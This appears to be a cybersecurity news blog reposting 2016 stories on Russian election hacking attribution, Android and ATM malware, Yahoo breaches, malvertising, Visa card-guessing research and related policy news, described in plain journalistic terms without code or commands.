Saturday, 31 December 2016

U.S. Government Maps Election Hacks to Russian Threat Groups

The Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI) on Thursday published a Joint Analysis Report (JAR) to detail the tools and infrastructure that Russian hackers used in attacks against the United States election.

The JAR was meant to offer technical details on the cyber activities of Russian civilian and military intelligence Services (RIS), some of which targeted the US government and political and private entities. This is the first time the malicious cyber activity, which the US calls GRIZZLY STEPPE, has been officially attributed to a specific hacking group.

As expected, U.S. President Barack Obama on Thursday announced several retaliatory actions against Moscow, imposing sanctions on two intelligence agencies, expelling 35 diplomats and denying access to two Russian compounds inside the United States.

In October this year, the US government officially accused Russia of involvement in the cyber-attacks against US political organizations, saying that some states had seen scanning and probing activity originating from servers operated by a Russian company, but no attribution was made at the time. The report (PDF) not only makes an attribution, but also provides recommended mitigations and suggested actions to take in response to indicators provided.

The JAR reveals that two different actors participated in the intrusion into a U.S. political party, one in the summer of 2015, namely Advanced Persistent Threat (APT) 29, and the other in spring 2016, namely APT28. The former is also known as Cozy Bear, or CozyDuke, while the latter is referred to as Fancy Bear, Pawn Storm, Strontium, Sofacy, Sednit and Tsar Team.

This falls in line with what intelligence firm CrowdStrike revealed in June, after assisting the Democratic National Committee (DNC), the formal governing body for the U.S. Democratic Party, to investigate cyber-attacks against its network. Later during summer, two security firms uncovered evidence that Fancy Bear breached the U.S. Democratic Congressional Campaign Committee (DCCC) as well.

Both Cozy Bear and Fancy Bear were previously linked to attacks against US government organizations and other governments worldwide. Their attack methods include spearphishing to deliver malicious droppers to the victims’ computers, or the use of short URLs upon the creation of domains closely resembling those of targeted organizations.

“Once APT28 and APT29 have access to victims, both groups exfiltrate and analyze information to gain intelligence value. These groups use this information to craft highly targeted spearphishing campaigns. These actors set up operational infrastructure to obfuscate their source infrastructure, host domains and malware for targeting organizations, establish command and control nodes, and harvest credentials and other valuable information from their targets,” the JAR reads.

Previously, security researchers managed to identify some of the tools that these actors use, such as the XTunnel malware that is believed to have been specifically created for the DNC hack. Other malicious applications include the Fysbis backdoor to target Linux machines, the Komplex Trojan targeting OS X systems, and the Carberp malware to compromise Windows computers.

While many in the cybersecurity understandably question the lack of appropriate details to sufficiently attribute the attacks to Russia, the US government claims that it has enough evidence to link RIS to the recent attacks. Moreover, it says that these aren’t isolated incidents, but that they are part of ongoing campaigns targeting the nation. The security industry, however, has widely criticized IOC-based attribution as a weak “evidence” to confidently point a finger.

In October, Kaspersky Lab security researchers warned of the deep implications of misattribution, suggesting that attribution is difficult, mainly because of the widespread use of sophisticated deception tactics among hacking groups.

“This activity by RIS is part of an ongoing campaign of cyber-enabled operations directed at the U.S. government and its citizens. These cyber operations have included spearphishing campaigns targeting government organizations, critical infrastructure entities, think tanks, universities, political organizations, and corporations leading to the theft of information,” the report claims.

For US organizations to better protect themselves against such attacks, the JAR provided a list of alternate names associated with RIS, along with Indicators of Compromise (IOCs), which can be found in the accompanying CSV and STIX xml files, and recommendations regarding the actions that network administrators should take to detect compromise and secure perimeters.

While some industry experts applauded the GRIZZLY STEPPE indicators provided by the U.S. Government, some experts urged caution for those quickly integrating them into their cyber defense measures.

“Be careful using the DHS/FBI GRIZZLY STEPPE indicators. Many are VPS, TOR relays, proxies, etc. which will generate lots of false positives,” Robert M. Lee, founder and CEO of Dragos Security and a former member of the intelligence community, Tweeted.

Sunday, 25 December 2016

DirtyCow and Drammer vulnerabilities "hijack Android devices"

The vulnerabilities are known colloquially as DirtyCow (CVE-2016-5195) and Drammer (CVE-2016-6728). While they are unrelated, they both represent a real risk to Android users as individuals have already published proof-of-concept exploit code online for both vulnerabilities, thus minimizing the time attackers would need  to understand and develop their own exploits from scratch. Additionally, industry researchers have already seen attackers using DirtyCow  to exploit Linux-based systems in the wild.

Given that the CVEs and the POC code are publicly available, enterprises should see this as a concern. If an attacker roots a device, she has full control over it, which means she may also be able to collect sensitive data from the device. If the victim is an employee, that may mean company information is being leaked. Having visibility into the kinds of apps, rooted devices, or outdated software running on the corporate network is critical.


The vulnerability extends back nine years and affects all versions of Android including the latest Android 7.0 Nougat. While Linus Torvalds created and released a patch for the Linux Kernel – which Android uses – the patch has not been released as a security update for Android users yet.

DirtyCow is an easy vulnerability to understand and proof-of-concept exploit code is already in the wild, available to researchers and attackers alike. . We expect to to see this issue patched in the November 2016 Android Security Update at the earliest.


The second vulnerability, called Drammer and discovered by VUSec, is the first time the Rowhammer vulnerability has been applied to ARM-based devices, in this case Android devices. Drammer is a hardware bug that can manipulate memory it doesn’t control by reading or “hammering” a row in memory to effectively induce another spot in memory to have its bit “flip” or change value. If an attacker does this hammering enough times, he or she can control which space in memory it points to so that a device can eventually be compromised and rooted. Drammer likely works on all versions of Android including the latest, but the mileage may vary.


They have banned the Drammer POC app from the Google Play Store. Lookout customers are protected from this test app. Our investigation revealed that the banned POC app published by the academic researchers is not overtly malicious, but it does exploit the vulnerability and has been observed to cause local denial-of-service on failed exploit attempts.

Enterprises should use a mobile security partner to gain awareness into the apps running on their employees’ devices and to receive timely alerts when one of those apps is risky or malicious.

Indian arrested in US for cyber attack

An Indian-origin teenager has been arrested in the US for carrying out a cyber-attack that swamped Arizona's emergency services with several bogus calls, an incident he claimed was a non-harmful joke gone wrong. Meetkumar Hiteshbhai Desai was taken into custody after the Surprise Police Department, Arizona, notified the Sheriff's Office of more than 100 hang-up 911 calls.

The Maricopa County Sheriff's Office arrested the 18-year-old, accusing him of carrying out a cyber-attack on the 911 system, according to a Sheriff's Office statement. Desai was booked into a Maricopa County jail on suspicion of three counts of computer tampering.

Interference with critical infrastructure could have disrupted the 911 system in the Phoenix area and potentially other states, The Arizona Republic reported. Investigators traced the calls and discovered they originated from a link posted to Twitter, according to the statement.

The link was to a site named "Meet Desai" and its domain was hosted out of San Francisco. When the link was clicked, it continually called 911 and would not let the caller hang up. Peoria police and the MCSO also received a large number of calls, and the volume had the potential to shut down 911 service across Maricopa County, the Sheriff's Office said. MCSO detectives identified 'Meet' and took him in for questioning last Wednesday.
"Meet claims that his intention was to make a non-harmful, but annoying bug that he believed was 'funny'," the Sheriff's Office statement said.

Desai told investigators that he was approached by an online friend with a bug. Desai then tweaked the bug so it would add pop-ups, prompts to open e-mail applications and activation of automatic telephone dialling on iOS devices, all via coding that Desai wrote himself.

Desai told sheriff's detectives that he was interested in programmes, bugs and viruses that he could manipulate and change. Desai said Apple Inc., the hardware and software company, would pay and credit him for discovering such bugs and viruses. The MCSO cyber crimes unit executed a search warrant and seized multiple items at Desai's residence that will be forensically examined, the Sheriff's Office said.

Wednesday, 21 December 2016

"Alice" Malware Drains All Cash from ATMs

Dubbed Alice, the malware is the most stripped down ATM threat seen to date. The malware has no information stealing capabilities and can’t even be controlled via the ATM’s numeric keypad. Initially discovered in November 2016, Alice is believed to have been around since 2014, and Trend Micro says that it is only the eighth ATM malware family seen to date, although such threats have been around for over nine years.

Use of the malware requires physical access to an ATM, and Trend Micro suggests that it has been designed for money mules to steal all the money available in an attacked cash machine, something that malware such as GreenDispenser was seen doing last year.
Unlike that piece of malware, however, the new threat doesn’t connect to the ATM’s PIN pad and can also be used via Remote Desktop Protocol (RDP), although Trend Micro says that there’s no evidence of such use as of now.

Malware analysis revealed that Alice (the name was included in the version information of the binary) was packed with a commercial, off-the-shelf packer/obfuscator called VMProtect, which prevents execution inside debuggers. Further, the malware checks its environment before execution and terminates itself if it determines it isn’t running on an ATM (it checks for a couple of registry keys and also requires specific DLLs to be installed on the system).

When running on a machine, Alice writes two files in the root directory, namely an empty 5 MB+ sized file called xfs_supp.sys and an error logfile called TRCERR.LOG. Next, it connects to the CurrencyDispenser1 peripheral, which is the dispenser device in the XFS environment and, if a correct PIN is provided, it displays information on the various cassettes with money loaded inside the machine.

Because the malware only connects to the CurrencyDispenser1 peripheral and doesn’t attempt to use the machine’s PIN pad, the researchers believe that the attackers physically open the ATM and infect it via USB or CD-ROM. Moreover, they suggest that the actors connect a keyboard to the machine’s mainboard and operate the malware through it.

The security researchers discovered that Alice supports three commands, each issued via specific PINs: one to drop a file for uninstallation, another to exit the program and run the uninstallation/cleanup routine, and a third to open the “operator panel.” This panel is where information on the cash available inside the ATM is displayed.

The attacker simply needs to enter the cassette’s ID for the ATM to dispense the money in it. The dispense command is sent to the CurrencyDispenser1 peripheral via the WFSExecute API. With ATMs typically having a 40-banknote dispensing limit, the attacker might have to perform the same operation multiple times to empty all the cash stored in a cassette. Information on the available cash is dynamically updated on the screen, so the attacker knows when a cassette is empty.

Trend Micro believes that the attackers manually replace the Windows Task Manager on the targeted machines with Alice, because the malware is usually found on infected systems in the form of taskmgr.exe. The malware doesn’t have a persistence method, but having it run as Task Manager means that Alice is invoked every time a command is issued to invoke the Task Manager.

“The existence of a PIN code prior to money dispensing suggests that Alice is used only for in-person attacks. Neither does Alice have an elaborate install or uninstall mechanism - it works by merely running the executable in the appropriate environment,” the researchers say.

The PIN authentication system is similar to that used by other ATM malware families, but it also provides the malware author with control over who has access to Alice. By changing the access code between samples, the author either prevents money mules from sharing the code or keeps track of individual money mules, or both.

The analyzed sample used a 4-digit passcode, but other samples could use longer PINs. The PIN cannot be brute-forced, as the malware would accept a limited number of inputs before terminating itself and displaying an error message. The researchers also believe that Alice was designed to run on any vendor’s hardware configured to use the Microsoft Extended Financial Services middleware (XFS).

“Up until recently, ATM malware was a niche category in the malware universe, used by a handful of criminal gangs in a highly targeted manner. We are now at a point where ATM malware is becoming mainstream,” Trend Micro researchers say.

Tuesday, 20 December 2016

Cyberattack may have caused the power outage that occurred in Ukraine

Ukrenergo said the outage occurred on Saturday, near midnight, at the North (Petrivtsi) substation, causing blackouts in the capital city of Kiev and the Kiev region.

Ukrenergo Acting Director Vsevolod Kovalchuk said workers switched to manual mode and started restoring power after 30 minutes. Power was fully restored after just over an hour, Kovalchuk said.
The statement published by Ukrenergo names equipment malfunction and hacking as the possible causes. However, in a message posted on Facebook, Kovalchuk said the main suspect was “external interference through the data network.” The organization’s cybersecurity experts are investigating the incident.

Roughly one year ago, the Ukrainian security service SBU accused Russia of causing outages with the aid of malware planted on the networks of several regional energy companies.

Researchers determined that these attacks involved two main pieces of malware: the BlackEnergy Trojan and KillDisk, a plugin designed to destroy files and make systems inoperable. The attackers directly interacted with the system in order to cut off the power supply, and they used KillDisk to make recovery more difficult, experts said.

In the 2015 attacks, power companies restored service within 3-6 hours by switching to manual mode, just like in the latest incident.

A report published recently by Booz Allen Hamilton revealed that the 2015 cyberattacks were likely part of a two-year campaign that targeted several sectors in Ukraine. Researchers identified 11 attacks aimed at the electricity, railway, media, mining and government sectors.

While experts have not found any hard evidence linking these attacks to Russia, the attackers’ significant resources appear to indicate the involvement of a nation state, and the threat actor’s goals align with Russian political interests.

Friday, 16 December 2016

Yahoo's billion-user database was sold on the Dark Web last August for $300,000.

The New York Times reports that a billion-user database was sold on the Dark Web last August for $300,000.

That’s according to Andrew Komarov, chief intelligence office at security firm InfoArmor. He told NYT that three buyers, including two prominent spammers and another who might be involved in espionage tactics purchased the entire database at the aforementioned price from a hacker group believed to based in Eastern Europe.

It’s lovely to know that it only costs $300,000 to be able to threaten a billion people’s online existence – which means each account is only worth $0.0003 to hackers who can ruin your life online in a matter of minutes.
Yahoo also doesn’t yet know who made off with all the data from the attack in 2013, which is said to be the largest breach of any company ever.
In addition to full names, passwords, birth dates and phone numbers, the database also contains security questions and backup email addresses that could help with resetting forgotten passwords.
That’s worrying, because these details may be common to several other online services and accounts, and could make many users vulnerable to phishing attacks which can feature accurate personal information in scammy emails to coax them into handing over things like their bank account, credit card and social security numbers.
Yahoo has said that it hasn’t been able to verify Komarov’s claims yet; meanwhile, the FBI said in a statement that it’s investigating the breach.
Komarov noted that the database is still up for sale, though bids for it have nove plummeted as low as $20,000 as Yahoo has forced a password reset.
It’ll be interesting to see what this revelation spells for the future of Yahoo, which is set to be sold to Verizon for $4.8 billion. Following the news of the 500 million-user breach earlier this year, the telcom giant said it wanted a billion-dollar discount on the deal. At this point, though, it seems like it might be better off walking away empty-handed.

Monday, 12 December 2016

Hackers to read any email ,Yahoo patches critical XSS vulnerability

The flaw was discovered and reported by Finland-based security researcher Jouko Pynnonen who earned $10,000 for the feat from Yahoo’s bug bounty program. The flaw allowed an attacker to read a victim’s email or create a virus infecting Yahoo Mail accounts among other things.
Unlike other email phishing scams and ransomware attacks, there is no need for the hacker to send a virus or trick the victim into clicking a specific link. Attackers would just send a mail to victims to access their emails.
#Yahoo #XSS #Hacking – Yahoo patches critical XSS vulnerability that would allow hackers to read any email – Yahoo, which was in the limelight for revealing a massive hack on its users earlier this year, has fixed a highly critical cross-site scripting (XSS) security flaw in its email system that would have allowed attackers to access any email.
An investigation, however, showed that attackers could very well bypass the filtration process by sending a YouTube link in the email that allows the hacker to execute JavaScript code and read user’s emails.
The report of the critical flaw comes just months after the tech giant admitted that massive data breach in 2014 gave access to information of more than 500 million user accounts. The attack, which is the largest in the history of the Internet, gave hackers access to names, email addresses, telephone numbers, encrypted or unencrypted security questions and answers, dates of birth, and encrypted passwords of users. The company later blamed the attack on state-sponsored parties but did not name any country.
The bug in this case resided in the email’s HTML filtering. When someone sends an email with different kinds of attachments to inspect the “raw” HTML of that email for security reasons, Yahoo uses the filtering process for HTML messages to keep malicious codes at bay.

Friday, 9 December 2016

ESET:Internet Users Possibly Exposed to Malicious Malvertising Campaign

The firm says that the cyber-criminals behind the campaign have been, since as least the beginning of October, distributing malicious ads promoting applications calling themselves “Browser Defence” and “Broxu” which redirect users to the Stegano exploit kit.
ESET added:
“Without requiring any user interaction, the initial script reports information about the victim’s machine to the attacker’s remote server. Based on server-side logic, the target is then served either a clean image or its almost imperceptibly modified malicious evil twin.
“Using the known Internet Explorer vulnerability CVE-2016-0162, the encoded script attempts to verify that it is not being run in a monitored environment such as a malware analyst’s machine,” and if the script does not detect any signs of monitoring, it redirects to the Stegano exploit kit’s landing page.
Upon successful exploitation, the executed shell code collects information on installed security products and performs – as paranoid as the cyber-criminals behind this attack – yet another check to verify that it is not being monitored. If results are favorable, it will attempt to download the encrypted payload from the same server again, disguised as a gif image.
Apparently, payloads detected so far include backdoors, banking trojans, spyware, file stealers and various trojan downloaders.
“This type of malicious activity shows clearly how cyber-criminals are adapting to the best means to distribute and infect as many as possible through the platforms that work," Mark James, IT security specialist at ESET, told Infosecurity. "There is a misconception that you have to visit ‘dodgy’ websites to get infected, but cyber-criminals are not stupid, why infect somewhere with a relatively small footfall when you can infect a website with infinitely more visitors thinking they are safe because they trust the name of the vendor?
“Some users still believe you actually have to click on a link or run a file to actually start the infection process, and what’s worse is in most cases the actual owner of the website is totally unaware they have a problem.”
The key to defending yourself, added James, is making sure you have a good regular updating internet security product installed along with keeping your operating system and applications patched and up-to-date.
"A lot of websites use ads to help fund the free content we want and using things like ad blockers can have an adverse effect on this revenue stream but is a means of defense that could stop this type of attack.”

Wednesday, 7 December 2016

Visa credit card will be hacked few second :researchers explained the main problem

A paper from Newcastle University’s Mohammed Aamir Ali, Budi Arief, Martin Emms and Aad van Moorsel describes how they were able to launch a “distributed guessing attack” against Alexa top-400 online merchants’ payment sites to work out expiry dates and CV2 values.

"Researchers have warned that deficiencies in Visa’s e-commerce payment network could allow attackers to brute force credit card details in as little as six seconds."

As different sites perform different security checks to validate card details, hackers can launch mass attempts across a range of sites to work out the key verification details.

MasterCard is not affected as it enforces centralized checks across transactions from different sites and so detects the guessing attack after fewer than 10 attempts, but Visa’s payment ecosystem does not, and so is wide-open to attack, the report claimed.

The researchers explained the main problem:

“The first weakness is that in many settings, the current online payment system does not detect multiple invalid payment requests on the same card from different websites. Effectively, this implies that practically unlimited guesses can be made by distributing the guesses over many websites, even if individual websites limit the number of attempts.

"Secondly, the attack scales well because different web merchants provide different fields, and therefore allow the guessing attack to obtain the desired card information one field at a time.”

Guessing an expiry date using the methodology detailed in the report would take at most 60 attempts, with the three-digit CV2 taking fewer than 1000.

The researchers also showed that in some cases even addresses could be guessed by the same method.

However, the attackers must already know the long card number.

It should also be noted that websites running the 3D Secure system are immune to attack as this pop up window mandates the user fill in a separate secret password and CV2 to complete an order

Tuesday, 6 December 2016

Millions of Android Users at Risk of MitM(man-in-the-middle) Attacks

The news has potential implications for users around the world, since AirDroid has an estimated user base of between 10 and 50 million devices, according to the Google Play Store. IT managers should see the news of a potential MitM attack as another reason to check the relevance of their security policies and mobile strategies.

Android Users at Risk

AirDroid sends the device authentication information to its statistics server through communication channels and encrypts it with Data Encryption Standard (DES) in the Electronic Codebook (ECB) mode, researcher Simone Margaritelli explained on the Zimperium blog. The problem is that fraudsters are able to access the encryption key since it’s hardcoded into the app. A nefarious actor on the device’s network could launch a MitM attack to steal authentication data and impersonate the victim for future requests.
A MitM attack is one where an attacker secretly relays and possibly alters the interaction between two parties. In this case, Margaritelli explained, an attacker could alter the response to the /phone/vncupgrade request. The app typically uses this request to scan for updates.

Don’t Snooze on MitM Attacks

The news will be of interest to IT and security managers in organizations that are evaluating the relative strengths of different mobile operating systems and devices, such as smartphones running Android and Apple devices running iOS.
According to InfoWorld, iPhones account for roughly 70 to 90 percent of devices used in the enterprise. Executive editor Galen Gruman advised businesses to hold back on Android due to security concerns, lack of application choices and the diffuse nature of the operating system.
However, more organizations are allowing workers to embrace bring-your-own-device (BYOD) or choose-your-own-device (CYOD) policies, ZDNet reported. To properly serve all employee types, enterprise mobility leaders must support both BYOD and CYOD and include corporate-owned, privately enabled elements.

MitM Mitigation

Margaritelli advised AirDroid users to use HTTPS channels exclusively, double-check the remote public key and always use digital signatures when updating. Additionally, users should adopt safe key exchange mechanisms instead of relying on encryption keys hardcoded within the app.
After Margaritelli persistently alerted the vendor of the exploit in May, the company issued updated versions 4.0.0 and 4.0.1. No security patch was issued, however. Margaritelli advised AirDroid users to uninstall the app until the vendor issues a fix.

Monday, 5 December 2016

Android malware steals access to more than one million Google account

 We believe that it is the largest Google account breach to date,” the security firm said in a blog post.

A new Android malware has managed to steal access to more than 1 million Google accounts, and it continues to infect new devices, according to security firm Checkpoint.

Simplify your security with 8 password managers for Windows, MacOS, iOS, and Android. 
The malware, called Gooligan, has been preying on devices running older versions of Android, from 4.1 to 5.1, which are still used widely, especially in Asia.

Gooligan masquerades as legitimate-looking Android apps. Checkpoint has found 86 titles, many of which are offered on third-party app stores, that contain the malicious coding.

Once Gooligan is installed, it attempts to root the device, as a way to gain full control. The malware does this by exploiting well-known vulnerabilities in older versions of Android.

“These exploits still plague many devices today because security patches that fix them may not be available for some versions of Android, or the patches were never installed by the user,” Checkpoint said.

Saturday, 3 December 2016

UK National Lottery Accounts Breached

Camelot claims that "there has been no unauthorized access to core National Lottery systems or any of our databases;" that is, it has not been hacked. Instead it suggests that the attackers used emails and passwords stolen from another online service.

Camelot, the company that runs the UK National Lottery, announced today that approximately 26,500 customer accounts had been fraudulently accessed. The activity was discovered on Monday.

Camelot is also confident that the affected customers cannot directly lose financially from the activity, although some personal information will have been accessed. It adds, "We have taken the measure of suspending the accounts of these players and are in the process of contacting them to help them re-activate their accounts securely." This will undoubtedly lead to increased phishing activity as criminals pretend to be Camelot offering help while actually soliciting further personal information.

The incident demonstrates the need for a responsible partnership between online organization and users. Both have their part to play. Organizations should require two factor authentication (and there are now several frictionless biometric options available), while customers should never reuse passwords for any account that holds personal or financial details

In both cases it seems as if the attackers timed their activity over a weekend. A similar number of accounts were affected, and in both cases credentials stolen elsewhere were used. The possibility that attackers are automating the extraction of customer details from large stolen databases should not be ignored. If this is the case, then it is not just affected Camelot customers that should change their passwords, but anyone who has reused passwords for more than one account. Needless to say, if a two-factor authentication option is available, it should be adopted.

"There's no doubt that when one database is breached, it's common for the credentials stolen to be tried elsewhere," comments ESET senior research fellow David Harley. "If you were a bad guy, why wouldn’t you try them elsewhere? It can be done manually, of course, but it doesn’t require a lot of effort to automate, either. Which is why I (and many other security commentators) routinely recommend that people don't re-use credentials, at any rate for sites that use and may retain significant data."

The danger, however, is whether these bad guys are able to find common third-party services among the millions of email addresses and passwords at their disposal; that is, if they can find a way of locating Tesco Bank customers, or Camelot customers within the databases. This would not be impossible. Among the stolen credentials there will be many that provide access to the users' actual email accounts.

Friday, 25 November 2016

Phishing Templates Advertised on YouTube

Scammers are abusing YouTube as a new way to promote backdoored phishing templates and provide potential buyers with information on how to use the nefarious software, Proofpoint researchers warn.

Because cybercrime is a business, crooks are constantly searching for new means to advertise their products to increase gains. For some, YouTube seemed like a good selling venue, and they decided to promote their kits on this legitimate website.

A search for “paypal scama” returns over 114,000 results, but buyers are in for a surprise, Proofpoint reveals. To be more precise, while the kits work as advertised, they also include a backdoor that automatically sends the phished information back to the author.

Proofpoint security researchers stumbled upon several YouTube videos that linked to phishing kits, templates, or to pages offering more information on these. The videos were created to show what the templates looked like and to instruct potential buyers on how to collect the phished information.

One of these videos, for example, showed an Amazon phishing template meant to replicate the legitimate login page on the web portal. The video’s authors instructed interested parties to contact them via a Facebook page.

When analyzing the code taken from another example of a phishing template that has been downloaded from a link on a similar video, the security researchers found the author’s Gmail address hardcoded in it. Thus, the author would receive the results of the phish each time the kit was used.

The same kit included a secondary email address that was also receiving the stolen information. What the security researchers didn’t manage to figure out was whether the same author included both addresses in the code or someone else added the second one and decided to redistribute the kit.

A PayPal scam analyzed by the researchers revealed that the cybercriminals attempted to avoid suspicion by adding a PHP include for a file called style.js just before the PHP “mail” command is used to send the stolen credentials. The style.js file, however, was found to include more encoded PHP code. The hidden command in the code was also meant to send the phished information to the author.

“Many of the video samples we found on YouTube have been posted for months, suggesting that YouTube does not have an automated mechanism for detection and removal of these types of videos and links. They remain a free, easy-to-use method for the authors of phishing kits and templates to advertise, demonstrate, and distribute their software,” Proofpoint says.

The security researchers say that they found multiple samples where the authors included backdoors that allow them to harvest the phished credentials even after other actors purchased the templates to use them in their own campaigns. The victims of phishing attacks suffer the most, because they have their credentials stolen by multiple actors each time the backdoored kits are used.

Tuesday, 22 November 2016

Facebook built censorship tool to get into China despite human rights risks

Facebook wants to be unbanned in China, so it’s built a censorship tool that could hide posts about prohibited topics from people in China, according to The New York Times‘ Mike Isaac. Rather than censor posts itself, Facebook would potentially provide the tool to a third-party in China such as a local partner company that could use it to prevent users in China from seeing content that breaks the government’s rules.
While China could unlock huge amounts of users and ad revenue for Facebook, the censorship tool could also be used to enact human rights abuse. If China could track which local users are trying to protest or bad-mouth the government, they could face persecution.
Perhaps that’s why The New York Times says several Facebook staffers who worked on the product have left the company. So far, there are no signs that Facebook has offered the tool to Chinese authorities. We don’t have details on the specifics of how it would work. It’s apparently only one of several ideas Facebook has explored for getting access to China, and they might never be launched.
But the existence of the tool brings up strong concerns about what’s best and safest for Chinese citizens.
Mark Zuckerberg has held in the past that some Facebook access could benefit them. The New York Times reports that at an internal Q&A about its intentions in China, Zuckerberg said, “It’s better for Facebook to be a part of enabling conversation, even if it’s not yet the full conversation.”
That mirrors Facebook’s stance about internet access, where it’s pushed the idea that limited free access to the web is better than none at all for those who can’t afford it. Facebook already allows Chinese companies to buy ads that run in places where it isn’t banned.
In a statement to TechCrunch, a Facebook spokesperson wrote: “We have long said that we are interested in China, and are spending time unders
tanding and learning more about the country. However, we have not made any decision on our approach to China. Our focus right now is on helping Chinese businesses and developers expand to new markets outside China by using our ad platform.”
Over time, the interpersonal connection via Facebook could strengthen communities who might be able to organize and protest the government outside of the app. Yet the censorship tool’s potential to be used to round up dissidents looms over any long-term benefit for citizens, or profit for Facebook.

Trump Mentions Cyber in 100-Day Plan

In a Monday evening video message, Donald Trump discussed how he intends to address trade, energy, regulation, national security, immigration and ethics-related issues during the first 100 days of his presidency—and he also addressed cybersecurity, very briefly.
Characterizing his agenda as "putting America first," the president-elect said that cyber-attacks from foreign governments and non-state terrorist actors is "one of our most critical national security concerns.”
Details were few, but the Republican pledged to create a Cyber Review Team to provide safeguarding recommendations and establish protocols and awareness training for government employees. He also said that he would direct the Department of Defense and the chairman of the Joint Chiefs of Staff to develop a comprehensive plan to protect the United States' infrastructure from cyber-attacks, as well as all other forms of attacks, during his first 100 days in office.
Rick Hanson, the executive vice president at Skyport Systems, said via email that “It’s not enough for a president to ask the DoD and JCS to develop a comprehensive cyber-plan, that has nothing new. We as a country need a clear focus from the top of the food chain down. A cabinet position that focuses on cyber as well as a strong focus and knowledge of the implications by the president himself. We can no longer rely on other agencies to build a plan."
Lastly Hanson added, "A plan must be built and executed by those who have an intimate knowledge of cyber-infrastructure and the threat landscape that not only exists but is possible. The sooner we secure our infrastructure from the core, the more efficient we will be in maintaining the security of our cyber-infrastructure. Regulations and guidelines must exist that define what our core infrastructure looks like from the bare metal. Security at the hardware level is essential for a truly secure infrastructure."

Monday, 21 November 2016

Twitter Celebs and Corporate Accounts Hacked Through Third Party

A third party Twitter site was hacked over the weekend and various celebrity and media accounts taken over to promote an “increase Twitter followers” service.
Twitter Counter, which claims to be the ‘#1 stat site powered by Twitter’ posted the following on Saturday:
“We can confirm that our service has been hacked; allowing posts on behalf of our users! We have launched an investigation into this matter.”
Earlier, countless celebrity accounts including those of Charlie Sheen and Lionel Messi, as well as the likes of Sky News, The New YorkerThe Next Web, and The Economist posted tweets on behalf of a site claiming to increase users’ Twitter followers.
Even the Twitter accounts of the US National Transportation Safety Board (NTSB), Playstation and Xbox were compromised.
Twitter Counter subsequently confirmed that it had addressed the problem and hackers can’t post on its users’ behalf any more.
It’s unclear exactly how the cyber attack on the firm occurred, but it has been quick to reassure customers with the following update:
“We ensure the privacy of our users' information. We do not store credit card information and we do not keep Twitter account passwords.”
Although the hackers appear to have focused their efforts on taking over high profile accounts with many followers, regular users would probably still do well to change their passwords and switch on two-factor authentication.
The incident is also a reminder of the potential security risk of linking one’s social accounts to third party services like Twitter Counter, as they can provide another way for hackers to attack.
In September, Twitter joined a new industry coalition designed to improve cybersecurity standards.
The Vendor Security Alliance (VSA) will help businesses assess how secure the companies they’re looking to partner with are to ensure there are no weak links in the chain.

FBI: US ATMs Could Be Hacked to Spew Cash

The FBI is warning that potential ATM attacks, similar to those in Taiwan and Thailand that caused ATMs to dispense millions, could happen in the US.
The FBI said in a recent bulletin that it was “monitoring emerging reports indicating that well-resourced and organized malicious cyber-actors have intentions to target the US financial sector.” Now, the Wall Street Journal has reported that the threat could be linked to malicious software used by the Russian gang known as Buhtrap, known for stealing money thorugh fraudulent wire transfers. Sources said that the group has been testing ATM hacking techniques on Russian banks, and will soon look to try them out on financial institutions in other countries.
The first such attack on an ATM system was reported in the Taiwanese capital Taipei in July, after 22 thieves made off with $2.6 million from ATMs around the country by causing them to spit out cash. Criminals from eastern Europe and Russia are said by police to have used malware to infiltrate cash machines run by First Commercial Bank. Three suspects were eventually arrested in Taipei and north-east Taiwan, with around half the money recovered.
A similar attack was reported at the Government Savings Bank in Thailand the following month. There, the Ripper malware was used in a sophisticated campaign to steal 12 million baht (£265,400) from ATMs in Thailand. Ripper targets three major global ATM manufacturers, and is unusual in that it interacts with the targeted machine via a specially crafted bank card featuring an EMV chip which acts as an authentication method.

Sunday, 20 November 2016

China adopts tough law on cyber-security

China today adopted a tough cybersecurity law which it said was aimed at safeguarding sovereignty on cyber space and national security, and to deal with related risks at home and abroad.
The new law was passed by China's legislature, the National 
According to the new law, the government will take measures to "monitor, defend and handle cybersecurity risks and threats originating from within the country or overseas sources, protecting key information infrastructure from attack, intrusion, disturbance and damage".
Efforts will also be made to punish criminal activities online and safeguard the order and security of cyberspace, state-run Xinhua news agency reported.
Under the new law, individual users and organisations are not allowed to jeopardise security on the Internet or use it to "damage national security, honour and interests".
Online activities that are attempts to overthrow the socialist system, split the nation, undermine national unity, advocate terrorism and extremism are all prohibited, according to the provisions, which also forbade activities including inciting ethnic hatred, discrimination and spreading violence and obscene information online.
The law was passed at the bimonthly session of the NPC Standing Committee, which concluded today, after a third reading.
China administers internet with massive firewalls to protect from outside interventions.
It also effectively banned social media outlets like Facebook and Twitter, and controls the local social media sites like Weibo through the firewalls blocking any content that harms the ruling Communist Party of China and the government.

Now Facebook users can automatically launch ''Safety Check''

Facebook will now allow its 1.2 billion users to automatically launch its crisis response tool, "Safety Check".

According to a report by on Thursday, this change will allow the community to decide the urgency of the nearby danger, something Facebook has struggled to grasp.

In the areas of immediate danger, Safety Check allows people to notify their family and friends that they are safe. This feature of Facebook has been used during natural calamities and terrorists attacks across world. 

"When Facebook had control of Safety Check, it had a high standard of what counted as a disaster. A typhoon in the Philippines might have six inches of water in your house, and in California, that'd be a big deal. But in the Philippines, we did research there, and people said this wasn't a big deal," quoted Peter Cottle, Facebook's lead engineer on crisis response. 

"In the past two years, Facebook turned on Safety Check 39 times. Compare that to 335 dangerous events flagged by its community-based Safety Check tool since the company began testing it in June. One of the first instances of a community-generated Safety Check was the Orlando nightclub shooting in June," the report said. 

Facebook considers an event as not being an emergency if the users ignore the Safety Check, which then fades itself. 

"We can tell how many people are spreading this and marking themselves safe, and how quickly it's growing. There's a real strong measure of urgency based on the rapidness of the people who are using the tool," Cotte said. 

However, Facebook has been criticised for being selective when it comes to launching Safety Check tool during a crisis. 

In November 2015, Facebook CEO Mark Zuckerberg had responded with a facebook post saying, ""We care about all people equally, and we will work hard to help people suffering in as many of these situations as we can." 

Reports said that Facebook was also testing out a Community Help page that "users can access after checking in as safe. There, users can post if they need shelter, food or supplies, or if they can provide any of those resources". 

The Community Help feature is expected to be available by January 2017.

Saturday, 19 November 2016

If you use iphone , Call Logs Quietly Synced to iCloud, Forensics Firm Warns

A log of all phone calls made from iPhone devices running iOS 8 or newer may be automatically synchronized to iCloud and susceptible to third-party access, digital forensics and IT security solutions provider Elcomsoft has warned.

